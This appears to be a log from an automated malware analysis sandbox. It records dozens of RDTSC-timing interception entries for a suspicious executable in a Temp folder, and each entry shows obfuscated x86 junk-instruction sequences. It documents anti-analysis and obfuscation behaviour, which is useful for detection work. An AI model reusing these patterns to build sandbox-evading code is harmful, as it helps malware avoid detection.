Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53208FC second address: 532091A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B192h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ecx, edi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 532091A second address: 5320920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5320920 second address: 532095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1144C8B18Dh 0x00000015 sbb al, FFFFFFF6h 0x00000018 jmp 00007F1144C8B191h 0x0000001d popfd 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53302AC second address: 53302B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53302B2 second address: 53302C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, A7h 0x0000000f mov dl, DFh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53302C4 second address: 53302DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F114478E742h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 53302DA second address: 53302DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 5300CF0 second address: 5300D55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F114478E73Eh 0x00000011 and dword ptr [eax], 00000000h 0x00000014 pushad 0x00000015 mov edx, esi 0x00000017 pushad 0x00000018 call 00007F114478E748h 0x0000001d pop ecx 0x0000001e push ebx 0x0000001f pop eax 0x00000020 popad 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F114478E748h 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52F094E second address: 52F09B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 78h 0x0000000d mov ecx, edx 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 call 00007F1144C8B191h 0x00000018 mov bx, cx 0x0000001b pop ecx 0x0000001c mov di, 7730h 0x00000020 popad 0x00000021 mov eax, dword ptr [ebp+08h] 0x00000024 pushad 0x00000025 jmp 00007F1144C8B195h 0x0000002a push eax 0x0000002b push edx 0x0000002c call 00007F1144C8B18Eh 0x00000031 pop eax 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52F09B1 second address: 52F09FA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F114478E73Bh 0x00000008 adc eax, 00DBAF3Eh 0x0000000e jmp 00007F114478E749h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 and dword ptr [eax], 00000000h 0x0000001a jmp 00007F114478E73Eh 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52F09FA second address: 52F09FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52F09FE second address: 52F0A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52F0A1B second address: 52F0A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52F0A21 second address: 52F0A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52F0A25 second address: 52F0A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B004E second address: 52B0054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B0054 second address: 52B005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B005A second address: 52B005E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B005E second address: 52B006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B006B second address: 52B00DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, ax 0x00000007 popad 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F114478E73Bh 0x00000012 adc cl, FFFFFFEEh 0x00000015 jmp 00007F114478E749h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F114478E740h 0x00000021 jmp 00007F114478E745h 0x00000026 popfd 0x00000027 popad 0x00000028 and esp, FFFFFFF8h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F114478E73Dh 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B00DA second address: 52B0109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b jmp 00007F1144C8B18Ch 0x00000010 mov eax, 50041F41h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov ecx, edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B0109 second address: 52B017C instructions: 0x00000000 rdtsc 0x00000002 call 00007F114478E73Fh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F114478E749h 0x00000010 sbb cx, BCF6h 0x00000015 jmp 00007F114478E741h 0x0000001a popfd 0x0000001b popad 0x0000001c xchg eax, ecx 0x0000001d jmp 00007F114478E73Eh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 mov ebx, ecx 0x00000026 push ecx 0x00000027 mov ax, di 0x0000002a pop edx 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007F114478E73Ch 0x00000035 mov bx, ax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B017C second address: 52B0182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B0182 second address: 52B01C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F114478E73Eh 0x00000011 mov ebx, dword ptr [ebp+10h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F114478E73Ah 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B01C1 second address: 52B01C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B01C7 second address: 52B0206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F114478E73Dh 0x00000013 and si, 93D6h 0x00000018 jmp 00007F114478E741h 0x0000001d popfd 0x0000001e movzx esi, dx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B0206 second address: 52B0225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1144C8B18Eh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B0225 second address: 52B022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B022B second address: 52B022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B022F second address: 52B029D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F114478E73Eh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 pushad 0x00000015 movzx esi, di 0x00000018 mov edi, 7A6B331Eh 0x0000001d popad 0x0000001e push ebx 0x0000001f pushad 0x00000020 mov dx, 2D82h 0x00000024 popad 0x00000025 mov dword ptr [esp], edi 0x00000028 pushad 0x00000029 mov cx, dx 0x0000002c pushfd 0x0000002d jmp 00007F114478E73Bh 0x00000032 xor al, 0000007Eh 0x00000035 jmp 00007F114478E749h 0x0000003a popfd 0x0000003b popad 0x0000003c test esi, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B029D second address: 52B02A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, 728Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B02A6 second address: 52B02AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B02AC second address: 52B02B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B02B0 second address: 52B02B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B02B4 second address: 52B02CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F11B69094DFh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ah, bl 0x00000013 push ecx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B02CA second address: 52B038A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F114478E749h 0x00000009 adc eax, 1A12C6C6h 0x0000000f jmp 00007F114478E741h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F114478E740h 0x0000001b jmp 00007F114478E745h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002b jmp 00007F114478E73Eh 0x00000030 je 00007F11B640CA23h 0x00000036 jmp 00007F114478E740h 0x0000003b mov edx, dword ptr [esi+44h] 0x0000003e pushad 0x0000003f mov ecx, 0B7B760Dh 0x00000044 mov ah, 66h 0x00000046 popad 0x00000047 or edx, dword ptr [ebp+0Ch] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F114478E73Eh 0x00000053 and esi, 75A20F58h 0x00000059 jmp 00007F114478E73Bh 0x0000005e popfd 0x0000005f pushad 0x00000060 popad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B038A second address: 52B03E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 jmp 00007F1144C8B193h 0x00000016 jne 00007F11B6909460h 0x0000001c pushad 0x0000001d mov al, DAh 0x0000001f mov dh, A3h 0x00000021 popad 0x00000022 test byte ptr [esi+48h], 00000001h 0x00000026 jmp 00007F1144C8B198h 0x0000002b jne 00007F11B6909451h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B03E2 second address: 52B03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52B03E8 second address: 52B03F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1144C8B18Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0008 second address: 52E000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E000C second address: 52E001D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E001D second address: 52E0042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F114478E73Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0042 second address: 52E008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F1144C8B191h 0x0000000b and eax, 12FF4116h 0x00000011 jmp 00007F1144C8B191h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a mov dx, 2E52h 0x0000001e call 00007F1144C8B193h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E008D second address: 52E00B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov edi, 78E0F526h 0x0000000d popad 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F114478E744h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E00B3 second address: 52E00F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c jmp 00007F1144C8B196h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F1144C8B190h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E00F3 second address: 52E00F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E00F7 second address: 52E00FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E00FD second address: 52E0143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F114478E746h 0x0000000f xchg eax, esi 0x00000010 jmp 00007F114478E740h 0x00000015 push eax 0x00000016 pushad 0x00000017 mov ecx, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b mov edi, 58697D2Eh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0143 second address: 52E0147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0147 second address: 52E01DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 push edi 0x0000000a pushfd 0x0000000b jmp 00007F114478E73Ch 0x00000010 or si, 8B78h 0x00000015 jmp 00007F114478E73Bh 0x0000001a popfd 0x0000001b pop ecx 0x0000001c mov edx, 4359F6BCh 0x00000021 popad 0x00000022 mov esi, dword ptr [ebp+08h] 0x00000025 jmp 00007F114478E73Bh 0x0000002a sub ebx, ebx 0x0000002c pushad 0x0000002d movsx ebx, ax 0x00000030 pushfd 0x00000031 jmp 00007F114478E73Eh 0x00000036 sbb ecx, 419FB508h 0x0000003c jmp 00007F114478E73Bh 0x00000041 popfd 0x00000042 popad 0x00000043 test esi, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007F114478E73Bh 0x0000004e sub ah, 0000004Eh 0x00000051 jmp 00007F114478E749h 0x00000056 popfd 0x00000057 push esi 0x00000058 pop edi 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E01DD second address: 52E0273 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B18Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F11B68D1326h 0x0000000f pushad 0x00000010 popad 0x00000011 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F1144C8B192h 0x0000001f adc esi, 4649AC28h 0x00000025 jmp 00007F1144C8B18Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F1144C8B198h 0x00000031 xor eax, 37EE5E88h 0x00000037 jmp 00007F1144C8B18Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov ecx, esi 0x00000040 jmp 00007F1144C8B196h 0x00000045 je 00007F11B68D12C2h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0273 second address: 52E0290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0290 second address: 52E0296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0296 second address: 52E029A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E029A second address: 52E02BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FB6968h], 00000002h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1144C8B192h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E02BD second address: 52E032A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F114478E73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F11B63D4820h 0x0000000f jmp 00007F114478E746h 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 pushad 0x00000018 jmp 00007F114478E73Eh 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F114478E740h 0x00000024 add ax, 2A68h 0x00000029 jmp 00007F114478E73Bh 0x0000002e popfd 0x0000002f mov esi, 1706785Fh 0x00000034 popad 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a mov al, C4h 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E032A second address: 52E0370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B193h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, esi 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F1144C8B195h 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F1144C8B18Eh 0x00000018 xchg eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0370 second address: 52E0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0374 second address: 52E0391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1144C8B199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E0391 second address: 52E03B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F114478E73Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov eax, 308FC839h 0x00000016 push esi 0x00000017 pop edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempRWMTG43DTVMTTDIWY4OCDKH8MIBDMSKV.EXE	RDTSC instruction interceptor: First address: 52E03B2 second address: 52E03C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1144C8B18Eh 0x00000009 rdtsc
